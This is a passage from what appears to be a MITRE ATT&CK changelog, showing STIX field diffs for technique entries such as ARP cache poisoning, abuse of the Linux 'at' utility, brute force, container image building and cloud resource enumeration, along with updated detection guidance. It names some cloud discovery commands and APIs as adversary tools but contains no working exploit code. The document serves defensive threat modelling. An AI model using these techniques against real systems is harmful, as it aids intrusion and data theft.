have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache. An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment. The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver) Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
x_mitre_version1.01.1

[T1583] Acquire Infrastructure

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Metadata', 'Internet Scan: Response Content', 'Domain Name: Active DNS', 'Domain Name: Passive DNS', 'Domain Name: Domain Registration']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:53:19.397000+00:002021-10-17 15:45:02.209000+00:00
x_mitre_detectionConsider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Once adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}
external_references{'source_name': 'Mandiant SCANdalous Jul 2020', 'description': 'Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.', 'url': 'https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation'}
external_references{'source_name': 'Koczwara Beacon Hunting Sep 2021', 'description': 'Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.', 'url': 'https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2'}

[T1137.006] Office Application Startup: Add-ins

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 17:34:02.877000+00:002021-08-16 21:26:09.296000+00:00
x_mitre_version1.01.1

[T1055.004] Process Injection: Asynchronous Procedure Call

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:29:30.961000+00:002021-10-18 12:23:46.476000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification

[T1053.001] Scheduled Task/Job: At (Linux)

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse the [at](https://attack.mitre.org/softt1Adversaries may abuse the [at](https://attack.mitre.org/soft
>ware/S0110) utility to perform task scheduling for initial o>ware/S0110) utility to perform task scheduling for initial, 
>r recurring execution of malicious code. The [at](https://at>recurring, or future execution of malicious code. The [at](h
>tack.mitre.org/software/S0110) command within Linux operatin>ttps://attack.mitre.org/software/S0110) command within Linux
>g systems enables administrators to schedule tasks.(Citation> operating systems enables administrators to schedule tasks.
>: Kifarunix - Task Scheduling in Linux)  An adversary may us>(Citation: Kifarunix - Task Scheduling in Linux)  An adversa
>e [at](https://attack.mitre.org/software/S0110) in Linux env>ry may use [at](https://attack.mitre.org/software/S0110) in 
>ironments to execute programs at system startup or on a sche>Linux environments to execute programs at system startup or 
>duled basis for persistence. [at](https://attack.mitre.org/s>on a scheduled basis for persistence. [at](https://attack.mi
>oftware/S0110) can also be abused to conduct remote Executio>tre.org/software/S0110) can also be abused to conduct remote
>n as part of Lateral Movement and or to run a process under > Execution as part of Lateral Movement and or to run a proce
>the context of a specified account.>ss under the context of a specified account.  Adversaries ma
 >y also abuse [at](https://attack.mitre.org/software/S0110) t
 >o break out of restricted environments by using a task to sp
 >awn an interactive system shell or to run system commands. S
 >imilarly, [at](https://attack.mitre.org/software/S0110) may 
 >also be used for [Privilege Escalation](https://attack.mitre
 >.org/tactics/TA0004) if the binary is allowed to run as supe
 >ruser via <code>sudo</code>.(Citation: GTFObins at)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 22:35:13.112000+00:002021-10-15 14:36:26.063000+00:00
descriptionAdversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)
x_mitre_detectionMonitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. Review all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019) Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'GTFObins at', 'description': 'Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.', 'url': 'https://gtfobins.github.io/gtfobins/at/'}
external_references{'source_name': 'rowland linux at 2019', 'description': 'Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.', 'url': 'https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/'}

[T1027.001] Obfuscated Files or Information: Binary Padding

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 18:25:33.828000+00:002021-10-15 13:53:02.135000+00:00
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Content

[T1110] Brute Force

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1Adversaries may use brute force techniques to gain access tot1Adversaries may use brute force techniques to gain access to
> accounts when passwords are unknown or when password hashes> accounts when passwords are unknown or when password hashes
> are obtained. Without knowledge of the password for an acco> are obtained. Without knowledge of the password for an acco
>unt or set of accounts, an adversary may systematically gues>unt or set of accounts, an adversary may systematically gues
>s the password using a repetitive or iterative mechanism. Br>s the password using a repetitive or iterative mechanism. Br
>ute forcing passwords can take place via interaction with a >ute forcing passwords can take place via interaction with a 
>service that will check the validity of those credentials or>service that will check the validity of those credentials or
> offline against previously acquired credential data, such a> offline against previously acquired credential data, such a
>s password hashes.>s password hashes.  Brute forcing credentials may take place
 > at various points during a breach. For example, adversaries
 > may attempt to brute force access to [Valid Accounts](https
 >://attack.mitre.org/techniques/T1078) within a victim enviro
 >nment leveraging knowledge gathered from other post-compromi
 >se behaviors such as [OS Credential Dumping](https://attack.
 >mitre.org/techniques/T1003), [Account Discovery](https://att
 >ack.mitre.org/techniques/T1087), or [Password Policy Discove
 >ry](https://attack.mitre.org/techniques/T1201). Adversaries 
 >may also combine brute forcing activity with behaviors such 
 >as [External Remote Services](https://attack.mitre.org/techn
 >iques/T1133) as part of Initial Access.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 12:04:36.243000+00:002021-09-30 19:18:16.672000+00:00
descriptionAdversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes. Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1612] Build Image on Host

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may build a container image directly on a host tt1Adversaries may build a container image directly on a host t
>o bypass defenses that monitor for the retrieval of maliciou>o bypass defenses that monitor for the retrieval of maliciou
>s images from a public registry. A remote <code>build</code>>s images from a public registry. A remote <code>build</code>
> request may be sent to the Docker API that includes a Docke> request may be sent to the Docker API that includes a Docke
>rfile that pulls a vanilla base image, such as alpine, from >rfile that pulls a vanilla base image, such as alpine, from 
>a public or local registry and then builds a custom image up>a public or local registry and then builds a custom image up
>on it.(Citation: Docker Build Image)  An adversary may take >on it.(Citation: Docker Build Image)  An adversary may take 
>advantage of that <code>build</code> API to build a custom i>advantage of that <code>build</code> API to build a custom i
>mage on the host that includes malware downloaded from their>mage on the host that includes malware downloaded from their
> C2 server, and then they then may utilize [Deploy Container> C2 server, and then they then may utilize [Deploy Container
>](https://attack.mitre.org/techniques/T1610) using that cust>](https://attack.mitre.org/techniques/T1610) using that cust
>om image.(Citation: Aqua Build Images on Hosts) If the base >om image.(Citation: Aqua Build Images on Hosts)(Citation: Aq
>image is pulled from a public registry, defenses will likely>ua Security Cloud Native Threat Report June 2021) If the bas
> not detect the image as malicious since it’s a vanilla imag>e image is pulled from a public registry, defenses will like
>e. If the base image already resides in a local registry, th>ly not detect the image as malicious since it’s a vanilla im
>e pull may be considered even less suspicious since the imag>age. If the base image already resides in a local registry, 
>e is already in the environment. >the pull may be considered even less suspicious since the im
 >age is already in the environment. 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-19 13:39:56.999000+00:002021-08-26 16:45:04.924000+00:00
descriptionAdversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image) An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image) An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Aqua Security Cloud Native Threat Report June 2021', 'description': 'Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.', 'url': 'https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation'}

[T1592.004] Gather Victim Host Information: Client Configurations

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:22:14.288000+00:002021-10-17 16:35:09.668000+00:00
x_mitre_detectionMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1078.004] Valid Accounts: Cloud Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Jon Sternstein, Stern Security']
values_changed
STIX FieldOld valueNew Value
modified2021-03-16 12:45:15.399000+00:002021-10-18 17:48:05.659000+00:00
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Metadata

[T1069.003] Permission Groups Discovery: Cloud Groups

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to find cloud groups and permission t1Adversaries may attempt to find cloud groups and permission 
>settings. The knowledge of cloud permission groups can help >settings. The knowledge of cloud permission groups can help 
>adversaries determine the particular roles of users and grou>adversaries determine the particular roles of users and grou
>ps within an environment, as well as which users are associa>ps within an environment, as well as which users are associa
>ted with a particular group.  With authenticated access ther>ted with a particular group.  With authenticated access ther
>e are several tools that can be used to find permissions gro>e are several tools that can be used to find permissions gro
>ups. The <code>Get-MsolRole</code> PowerShell cmdlet can be >ups. The <code>Get-MsolRole</code> PowerShell cmdlet can be 
>used to obtain roles and permissions groups for Exchange and>used to obtain roles and permissions groups for Exchange and
> Office 365 accounts.(Citation: Microsoft Msolrole)(Citation> Office 365 accounts (Citation: Microsoft Msolrole)(Citation
>: GitHub Raindance)  Azure CLI (AZ CLI) and the Google Cloud>: GitHub Raindance).  Azure CLI (AZ CLI) and the Google Clou
> Identity Provider API also provide interfaces to obtain per>d Identity Provider API also provide interfaces to obtain pe
>missions groups. The command <code>az ad user get-member-gro>rmissions groups. The command <code>az ad user get-member-gr
>ups</code> will list groups associated to a user account for>oups</code> will list groups associated to a user account fo
> Azure while the API endpoint <code>GET https://cloudidentit>r Azure while the API endpoint <code>GET https://cloudidenti
>y.googleapis.com/v1/groups</code> lists group resources avai>ty.googleapis.com/v1/groups</code> lists group resources ava
>lable to a user for Google.(Citation: Microsoft AZ CLI)(Cita>ilable to a user for Google (Citation: Microsoft AZ CLI)(Cit
>tion: Black Hills Red Teaming MS AD Azure, 2018)(Citation: G>ation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: 
>oogle Cloud Identity API Documentation)>Google Cloud Identity API Documentation).  Adversaries may a
 >ttempt to list ACLs for objects to determine the owner and o
 >ther accounts with access to the object, for example, via th
 >e AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucke
 >t ACL). Using this information an adversary can target accou
 >nts with permissions to a given object or leverage accounts 
 >they have already compromised to access the object.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Regina Elwell', 'Isif Ibrahima']
values_changed
STIX FieldOld valueNew Value
modified2021-03-30 12:42:46.315000+00:002021-06-25 12:13:37.940000+00:00
descriptionAdversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance) Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation). Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'AWS Get Bucket ACL', 'description': 'Amazon Web Services. (n.d.). Retrieved May 28, 2021.', 'url': 'https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html'}

[T1580] Cloud Infrastructure Discovery

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary may attempt to discover resources that are avait1An adversary may attempt to discover resources that are avai
>lable within an infrastructure-as-a-service (IaaS) environme>lable within an infrastructure-as-a-service (IaaS) environme
>nt. This includes compute service resources such as instance>nt. This includes compute service resources such as instance
>s, virtual machines, and snapshots as well as resources of o>s, virtual machines, and snapshots as well as resources of o
>ther services including the storage and database services.  >ther services including the storage and database services.  
>Cloud providers offer methods such as APIs and commands issu>Cloud providers offer methods such as APIs and commands issu
>ed through CLIs to serve information about infrastructure. F>ed through CLIs to serve information about infrastructure. F
>or example, AWS provides a <code>DescribeInstances</code> AP>or example, AWS provides a <code>DescribeInstances</code> AP
>I within the Amazon EC2 API that can return information abou>I within the Amazon EC2 API that can return information abou
>t one or more instances within an account, as well as the <c>t one or more instances within an account, the <code>ListBuc
>ode>ListBuckets</code> API that returns a list of all bucket>kets</code> API that returns a list of all buckets owned by 
>s owned by the authenticated sender of the request.(Citation>the authenticated sender of the request, or the <code>GetPub
>: Amazon Describe Instance)(Citation: Amazon Describe Instan>licAccessBlock</code> API to retrieve access block configura
>ces API) Similarly, GCP's Cloud SDK CLI provides the <code>g>tion for a bucket (Citation: Amazon Describe Instance)(Citat
>cloud compute instances list</code> command to list all Goog>ion: Amazon Describe Instances API)(Citation: AWS Get Public
>le Compute Engine instances in a project(Citation: Google Co> Access Block).  Similarly, GCP's Cloud SDK CLI provides the
>mpute Instances), and Azure's CLI command <code>az vm list</> <code>gcloud compute instances list</code> command to list 
>code> lists details of virtual machines.(Citation: Microsoft>all Google Compute Engine instances in a project (Citation: 
> AZ CLI)  An adversary may enumerate resources using a compr>Google Compute Instances), and Azure's CLI command <code>az 
>omised user's access keys to determine which are available t>vm list</code> lists details of virtual machines.(Citation: 
>o that user.(Citation: Expel IO Evil in AWS) The discovery o>Microsoft AZ CLI)  An adversary may enumerate resources usin
>f these available resources may help adversaries determine t>g a compromised user's access keys to determine which are av
>heir next steps in the Cloud environment, such as establishi>ailable to that user.(Citation: Expel IO Evil in AWS) The di
>ng Persistence.(Citation: Mandiant M-Trends 2020) Unlike in >scovery of these available resources may help adversaries de
>[Cloud Service Discovery](https://attack.mitre.org/technique>termine their next steps in the Cloud environment, such as e
>s/T1526), this technique focuses on the discovery of compone>stablishing Persistence.(Citation: Mandiant M-Trends 2020)An
>nts of the provided services rather than the services themse> adversary may also use this information to change the confi
>lves.>guration to make the bucket publicly accessible, allowing da
 >ta to be accessed without authentication. Adversaries have a
 >lso may use infrastructure discovery APIs such as <code>Desc
 >ribeDBInstances</code> to determine size, owner, permissions
 >, and network ACLs of database resources. (Citation: AWS Des
 >cribe DB Instances) Adversaries can use this information to 
 >determine the potential value of databases and discover the 
 >requirements to access them. Unlike in [Cloud Service Discov
 >ery](https://attack.mitre.org/techniques/T1526), this techni
 >que focuses on the discovery of components of the provided s
 >ervices rather than the services themselves.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:02.163000+00:002021-09-02 14:42:19.761000+00:00
descriptionAn adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
external_references[3]['source_name']Google Compute InstancesAWS Get Public Access Block
external_references[3]['description']Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.Amazon Web Services. (n.d.). Retrieved May 28, 2021.
external_references[3]['url']https://cloud.google.com/sdk/gcloud/reference/compute/instances/listhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
external_references[4]['source_name']Microsoft AZ CLIGoogle Compute Instances
external_references[4]['description']Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.
external_references[4]['url']https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latesthttps://cloud.google.com/sdk/gcloud/reference/compute/instances/list
external_references[5]['source_name']Expel IO Evil in AWSMicrosoft AZ CLI
external_references[5]['description']A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
external_references[5]['url']https://expel.io/blog/finding-evil-in-aws/https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
external_references[6]['source_name']Mandiant M-Trends 2020Expel IO Evil in AWS
external_references[6]['description']Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.
external_references[6]['url']https://content.fireeye.com/m-trends/rpt-m-trends-2020https://expel.io/blog/finding-evil-in-aws/
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Mandiant M-Trends 2020', 'description': 'Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.', 'url': 'https://content.fireeye.com/m-trends/rpt-m-trends-2020'}
external_references{'source_name': 'AWS Describe DB Instances', 'description': 'Amazon Web Services. (n.d.). Retrieved May 28, 2021.', 'url': 'https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html'}
x_mitre_contributorsRegina Elwell
x_mitre_contributorsIsif Ibrahima

[T1587.002] Develop Capabilities: Code Signing Certificates

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Malware Repository: Malware Metadata']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:06:56.855000+00:002021-10-17 16:07:08.549000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
x_mitre_version1.01.1

[T1588.003] Obtain Capabilities: Code Signing Certificates

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Malware Repository: Malware Metadata']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:13:16.259000+00:002021-10-17 16:19:50.018000+00:00
